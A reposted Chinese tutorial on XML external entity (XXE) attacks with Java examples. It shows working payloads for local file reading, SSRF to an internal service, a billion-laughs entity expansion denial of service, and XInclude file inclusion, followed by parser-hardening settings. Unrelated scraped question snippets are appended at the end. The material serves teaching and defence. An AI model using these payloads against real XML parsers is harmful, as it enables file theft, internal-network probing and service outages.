个人中心
文章发布
退出
作者热门文章
- Java锁的逻辑(结合对象头和ObjectMonitor)
- 还在用饼状图?来瞧瞧这些炫酷的百分比可视化新图形(附代码实现)⛵
- 自动注册实体类到EntityFrameworkCore上下文,并适配ABP及ABPVNext
- 基于Sklearn机器学习代码实战
40
4
本文分享自华为云社区《 【安全攻防】深入浅出实战系列专题-XXE攻击 》,作者: MDKing.
XML基础:XML 指可扩展标记语言(Extensible Markup Language),是一种与HTML类似的纯文本的标记语言,设计宗旨是为了传输数据,而非显示数据。是W3C的推荐标准.
XML标签:XML被设计为具有自我描述性,XML标签是没有被预定义的,需要自行定义标签与文档结构。如下为包含了标题、发送者、接受者、内容等信息的xml文档.
DTD:指文档类型定义(Document Type Definition),通过定义根节点、元素(ELEMENT)、属性(ATTLIST)、实体(ENTITY)等约束了xml文档的内容按照指定的格式承载数据.
如下图,通过 <!DOCTYPE 根节点名称 [DTD内容]> 的规则指定了该xml文件合法的根节点元素为persons,它的子节点元素为person,以及person的子层元素以及属性.
。
。
实体:在DTD中通过 <!ENTITY 实体名称 "实体的值"> 等方式定义实体,相当于定义变量的作用,可在文档内容中通过 &实体名称; 的方式引用实体的值(变量的值).
实体类型:实体分为多种类型,从使用范围的维度,分为参数实体(只能在DTD中引用)与非参数实体(可以在DTD中、文档内容中引用)。区别如下:
| 样例 | 引用方式 | 使用范围与场景 | |
| 非参数实体 | <!ENTITY country "中国"> | &country; | 在DTD中、文档内容中均可引用,一般用来取代重复的字符串 |
| 参数实体 | <!ENTITY % countrydefine "xxx元素的DTD定义内容"> | %country; | 仅能在DTD定义中引用,一般用来保存某段重复的DTD定义 |
从值的来源维度,分为内部实体、外部实体。内部实体为文档内部直接定义值,外部实体为通过http、file等协议从文件外的某处获取内容作为实体的值。区别如下:
| 样例 | 特征与使用场景 | |
| 内部实体 | <!ENTITY country "中国"> | 值是明确的字符串常量等,可以直接定义在本文档中 |
| 外部实体 | <!ENTITY country SYSTEM "file:///D:/country.txt"> | 值来源于其它文件或者网络 |
XML外部实体注入:XML External Entity Injection即xml外部实体注入漏洞,简称XXE漏洞。当xml解析器支持对于外部实体的解析且待解析的xml文件可由外部控制时,就会发生此攻击。攻击者可以通过构造外部实体的内容为本地其它目录下的文件、访问内网/外网的制定url等方式实现自己的攻击目的,达到信息泄露、命令执行、拒绝服务、SSRF、内网端口扫描等攻击目的.
Xinclude:Xinclude用来导入外部xml文档,类似于php的include,将外部定义的dtd引入当前文件。该特性可以解决部分场景下引入外部实体具有的局限性,但并不是所有XML 解析器都支持 XInclude,W3C在XInclude Implementations Report中列出了支持的列表,结合XInclude特性也可以在部分场景下执行XXE攻击。常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置 factory.setNamespaceAware(true);factory.setXIncludeAware(true); 如果不关闭Xinclude,仅禁用DTD解析也是存在安全风险的.
目的与场景:通过构造特定格式的xml文档,读取服务器上指定文件的内容,达到敏感信息获取的目的.
xml文档payload:
<?xml version=
"
1.0
"
encoding=
"
UTF-8
"
?>
<!
DOCTYPE root [
<!ELEMENT root (#PCDATA)>
<!ENTITY pw SYSTEM
"
file:///D:/securetest/xxe/passwd.txt
"
>]>
<root>&pw;</root>
服务器端代码:
public
static
void
main(String[] args) throws ParserConfigurationException, IOException, SAXException {
String xml
=
"
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n
"
+
"
<!DOCTYPE root [ \n
"
+
"
\t<!ELEMENT root (#PCDATA)>\n
"
+
"
\t<!ENTITY pw SYSTEM \"file:///D:/securetest/xxe/passwd.txt\">]>\n
"
+
"
<root>&pw;</root>
"
;
DocumentBuilderFactory factory
=
DocumentBuilderFactory.newInstance();
factory.setValidating(
true
);
DocumentBuilder builder
=
factory.newDocumentBuilder();
InputStream
in
=
new
ByteArrayInputStream(xml.getBytes());
org.w3c.dom.Document document
= builder.parse(
in
);
Element rootElement
=
document.getDocumentElement();
//
打印根节点元素名称、内容
System.
out
.println(
"
根节点名称:
"
+
rootElement.getNodeName());
System.
out
.println(
"
根节点内容:
"
+
rootElement.getTextContent());
}
执行结果:成功读取到了passwd.txt的内容。(服务端代码样例中打印在控制台上,对应实际系统中需要有将文档内容打印到界面上等处理。) 。
目的与场景:通过构造特定格式的xml文档,可以借助目标主机访问内网的其它主机开放的内部接口等服务.
内网其它服务器模拟准备:通过node staticServer.js命令启动服务器,监听3000端口 。
let express = require(
'
express
'
)
let app
=
express();
app.use(express.
static
(__dirname));
app.
get
(
'
/getInnerData
'
, function(req, res) {
console.log(req.headers)
res.end(
'
AK:abc;SK:ABDCEF
'
)
})
app.listen(
3000
)
经验证,http请求可成功返回 。
xml文档payload:
<?xml version=
"
1.0
"
encoding=
"
UTF-8
"
?>
<!
DOCTYPE root [
<!ELEMENT root (#PCDATA)>
<!ENTITY pw SYSTEM
"
http://127.0.0.1:3000/getInnerData
"
>]>
<root>&pw;</root>
服务器端代码:
public
static
void
main(String[] args) throws ParserConfigurationException, IOException, SAXException {
String xml
=
"
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n
"
+
"
<!DOCTYPE root [ \n
"
+
"
\t<!ELEMENT root (#PCDATA)>\n
"
+
"
\t<!ENTITY pw SYSTEM \"http://127.0.0.1:3000/getInnerData\">]>\n
"
+
"
<root>&pw;</root>
"
;
DocumentBuilderFactory factory
=
DocumentBuilderFactory.newInstance();
factory.setValidating(
true
);
DocumentBuilder builder
=
factory.newDocumentBuilder();
InputStream
in
=
new
ByteArrayInputStream(xml.getBytes());
org.w3c.dom.Document document
= builder.parse(
in
);
Element rootElement
=
document.getDocumentElement();
//
打印根节点元素名称、内容
System.
out
.println(
"
根节点名称:
"
+
rootElement.getNodeName());
System.
out
.println(
"
根节点内容:
"
+
rootElement.getTextContent());
}
执行结果:成功读取到内部接口getInnerData的内容.
目的与场景:通过构造特殊格式的xml文档,定义多层递归引用的实体(变量)让解析的内容以及时间以指数级增长,以实现DDos攻击的效果.
xml文档payload:
<?xml version=
"
1.0
"
encoding=
"
UTF-8
"
?>
<!
DOCTYPE root [
<!ELEMENT root (#PCDATA)>
<!ENTITY lol
"
lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol\n
"
>
<!ENTITY lol1
"
&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;
"
>
<!ENTITY lol2
"
&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;
"
>
<!ENTITY lol3
"
&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;
"
>
<!ENTITY lol4
"
&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;
"
>
<!ENTITY lol5
"
&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;
"
>
<!ENTITY lol6
"
&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;
"
>]>
<root>&lol6;</root>
服务器端代码:
public
static
void
main(String[] args) throws ParserConfigurationException, IOException, SAXException {
//
获取当前时间
LocalDateTime startTime =
LocalDateTime.now();
String xml
=
"
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n
"
+
"
<!DOCTYPE root [ \n
"
+
"
\t<!ELEMENT root (#PCDATA)>\n
"
+
"
\t<!ENTITY lol \"lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol\n\">\n
"
+
"
\t<!ENTITY lol1 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\n
"
+
"
\t<!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\">\n
"
+
"
\t<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\n
"
+
"
\t<!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\n
"
+
"
\t<!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">\n
"
+
"
\t<!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;\">]>\n
"
+
"
<root>&lol6;</root>
"
;
DocumentBuilderFactory factory
=
DocumentBuilderFactory.newInstance();
factory.setValidating(
true
);
factory.setExpandEntityReferences(
false
);
System.setProperty(
"
entityExpansionLimit
"
,
"
50000000
"
);
DocumentBuilder builder
=
factory.newDocumentBuilder();
InputStream
in
=
new
ByteArrayInputStream(xml.getBytes());
org.w3c.dom.Document document
= builder.parse(
in
);
Element rootElement
=
document.getDocumentElement();
//
打印根节点元素名称、内容
System.
out
.println(
"
根节点名称:
"
+
rootElement.getNodeName());
System.
out
.println(
"
根节点内容:
"
+
rootElement.getTextContent());
System.
out
.println(
"
根节点内容长度:
"
+
rootElement.getTextContent().length());
System.
out
.println(
"
根节点内容大小:
"
+ rootElement.getTextContent().getBytes().length / (
1024
*
1024
) +
"
MB
"
);
//
获取当前时间并计算时间差
LocalDateTime endTime =
LocalDateTime.now();
Duration duration
=
Duration.between(startTime, endTime);
System.
out
.println(
"
解析执行时间为:
"
+ duration.toMillis() +
"
豪秒
"
);
}
执行结果:如果程序中不对解析实体做限制的话,可以通过少量的DTD定义,实现海量大小的解析结果的效果,会大量占用服务器的处理、存储.
目的与场景:该样例演示了如果打开了Xinclude开关的危险性,即使做了DTD的安全禁用,还是依然可以进行XXE攻击.
xml文档payload:
<?xml version=
"
1.0
"
encoding=
"
UTF-8
"
?>
<!
DOCTYPE root [
<!ELEMENT root (#PCDATA)>
<!ENTITY lol
"
lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol\n
"
>
<!ENTITY lol1
"
&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;
"
>
<!ENTITY lol2
"
&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;
"
>
<!ENTITY lol3
"
&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;
"
>
<!ENTITY lol4
"
&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;
"
>
<!ENTITY lol5
"
&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;
"
>
<!ENTITY lol6
"
&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;
"
>]>
<root>&lol6;</root>
服务端代码:
public
static
void
main(String[] args) throws ParserConfigurationException, IOException, SAXException {
String xml
=
"
<?xml version=\"1.0\" ?>\n
"
+
"
<root xmlns:xi=\"http://www.w3.org/2001/XInclude\">\n
"
+
"
<xi:include href=\"file:///D:/securetest/xxe/passwd.txt\" parse=\"text\"/>\n
"
+
"
</root>
"
;
DocumentBuilderFactory factory
=
DocumentBuilderFactory.newInstance();
factory.setFeature(
"
http://apache.org/xml/features/disallow-doctype-decl
"
,
true
);
factory.setNamespaceAware(
true
);
factory.setXIncludeAware(
true
);
DocumentBuilder builder
=
factory.newDocumentBuilder();
InputStream
in
=
new
ByteArrayInputStream(xml.getBytes());
org.w3c.dom.Document document
= builder.parse(
in
);
Element rootElement
=
document.getDocumentElement();
//
打印根节点元素名称、内容
System.
out
.println(
"
根节点名称:
"
+
rootElement.getNodeName());
System.
out
.println(
"
根节点内容:
"
+
rootElement.getTextContent());
}
执行结果:
常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置 factory.setNamespaceAware(true);factory.setXIncludeAware(true); 如果不关闭Xinclude,仅禁用DTD解析也是存在安全风险的。2.4中演示了即使禁用了DTD解析,打开Xinclude功能开关后存在的安全问题。所以从安全角度考虑,首先禁止打开Xinclude开关.
如果业务中不需要进行DTD定义以及解析,最好的方式就是完全禁用DTD解析。例如Dom类型的解析器中通过 factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 来禁用。效果如下:
方式一:如果业务中确实需要DTD定义以及解析,可以通过仅禁用外部实体解析的方式进行安全防护。例如Dom类型的解析器中通过如下方式设置禁用外部实体解析:
factory.setFeature(
"
http://xml.org/sax/features/external-general-entities
"
,
false
);
factory.setFeature(
"
http://xml.org/sax/features/external-parameter-entities
"
,
false
);
factory.setFeature(
"
http://apache.org/xml/features/nonvalidating/load-external-dtd
"
,
false
);
效果如下:
方式二:禁用外部实体解析还有另外一种方式,重写实体解析函数,核心代码:
builder.setEntityResolver(
new
EntityResolver() {
@Override
public
InputSource resolveEntity(String publicId, String systemId) throws SAXException,IOException {
return
new
InputSource(
new
StringReader(
""
));
}
});
效果如下:
IoT已将包括上述安全编码逻辑在内的常用XML解析器的安全编码规范提取到IoT自定义安全规则集,上线到所有IoT服务的生产发布流水线中,自动化的保障各服务的现网代码安全。如:
点击关注,第一时间了解华为云新鲜技术~ 。
。
最后此篇关于从原理到实战,详解XXE攻击的文章就讲到这里了,如果你想了解更多关于从原理到实战,详解XXE攻击的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
40
4
0
我想创建一个游戏,您可以在其中尝试避开“攻击”您的物体(圆圈)。我这样做的方式: 首先计算对象和我之间的 x_and y 差值(在这段代码中 AI_x 是对象的 x 位置(AI_y:y 位置),x,y
前言 传统的 DDOS 防御通常使用“硬抗”的方式,导致开销很大,而且有时效果并不好。例如使用 DNS 切换故障 IP 的方案,由于域名会受到缓存等因素的影响通常有分钟级延时,前端难以快速生效。例
我们目前正在使用 OWASP Antisamy 项目来保护我们的应用程序免受 XSS 攻击。当任何给定的表单提交给服务器时,每个输入字段都会被清理。它工作正常,但我们在公司名称、组织名称等字段上遇到问
正则表达式: ^\d+(\.\d+)*$ 我试图打破它: 1234567890.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.
我正在创建一个网页,用户可以在其中交互并在远程计算机上执行基本的文件系统操作(创建文件/目录、删除文件/目录、导航文件系统)。 该网页是基本的 HTML(UTF-8 编码)和 Javascript。我
两个客户端 Alice 和 Bob 使用服务器登录并通过服务器交换消息。登录时,他们都发送他们的公钥以存储在服务器上。当 Alice 想与 Bob 通话时,她用 Bob 的公钥加密一个对称 key ,
一直在阅读 MitB 攻击,有些事情让我担心。 来自 WIKI : The use of strong authentication tools simply creates an increased
很难说出这里问的是什么。这个问题是模棱两可的、模糊的、不完整的、过于宽泛的或修辞的,无法以目前的形式得到合理的回答。如需帮助澄清这个问题以便重新打开它,visit the help center .
我正在使用 Summernote 所见即所得编辑器(如下所示),发现它使用 HTML 标签来格式化文本。 如何保护我的应用程序免受 XSS 攻击?我将输入存储为纯文本,并使用输出:{!! $body
我有一个应用程序,用户可以在其中注册并输入他们的手机和其他数据。 为了验证用户是否有效,在我将其保存到我的数据库之前,我向用户发送了一 strip 有代码的短信。之后他们应该在表单中输入代码。 问题是
由于 xpath 注入(inject)攻击正在攻击网站,因此我们需要保护 xml 文档作为 xpath 查询参数化的解决方案。如果有人可以解释xpath查询的参数化是什么意思,请帮忙?以及这种参数化如
我想知道电子邮件地址是否可以用于 XSS 攻击。 假设有一个网站,您可以在其中注册并提供他的电子邮件地址。如果有人想攻击给定的网站,他或她可能会创建一个电子邮件地址,例如: ""@stmpname
这可能更适合 Serverfault,但许多只来这里的 web 开发人员可能会从这个问题的可能答案中受益。 问题是:您如何有效地保护自己免受针对您的网络服务器的拒绝服务攻击? 看完这篇 article
检查引荐来源网址是否足以防止跨站点请求伪造攻击?我知道引荐来源网址可能会被欺骗,但是攻击者有没有办法为客户端做到这一点?我知道代币是常态,但这行得通吗? 最佳答案 这是一个 3 年前的问题,有四个不同
我从输入类型中获取值,如下所示: var num = $(document).find('#num').val(); 我尝试使用以下代码来避免输入类型受到 XSS 攻击: num = j
我需要使用超链接动态更新以下代码中的“src”链接,该超链接又指向另一个 .js 文件。以下只是用于“src”的示例 URL。我的问题是,允许在运行时更改“src”,此代码是否容易受到 XSS 攻击?
我在 OWASP 和网络上看到了很多关于如何避免/防止 XSS 攻击的信息。但是,我还没有找到任何提及在检测到 XSS 攻击时如何响应的内容。 应返回什么 HTTP 状态代码(即 400、403...
保护站点免受 DoS 攻击的最佳方法是什么?知道流行的网站/服务如何处理这个问题吗? 应用程序、操作系统、网络、托管级别有哪些工具/服务? 如果有人能分享他们处理过的真实经历,那就太好了。 谢谢 最佳
我到处寻找缓解方法 this vulnerability ,我发现类似: Just disable http compression. 嗯,这很痛苦,因为压缩可以节省大量带宽,而且还可以让您的网页加载
服务器,一个运行 Spring 2.5.6 的独立 SE 应用程序和一个嵌入式 jetty 。客户端、Swing 应用程序使用 HttpInvoker 连接到服务器。 服务器公开了很多服务,现在出现了
我是一名优秀的程序员,十分优秀!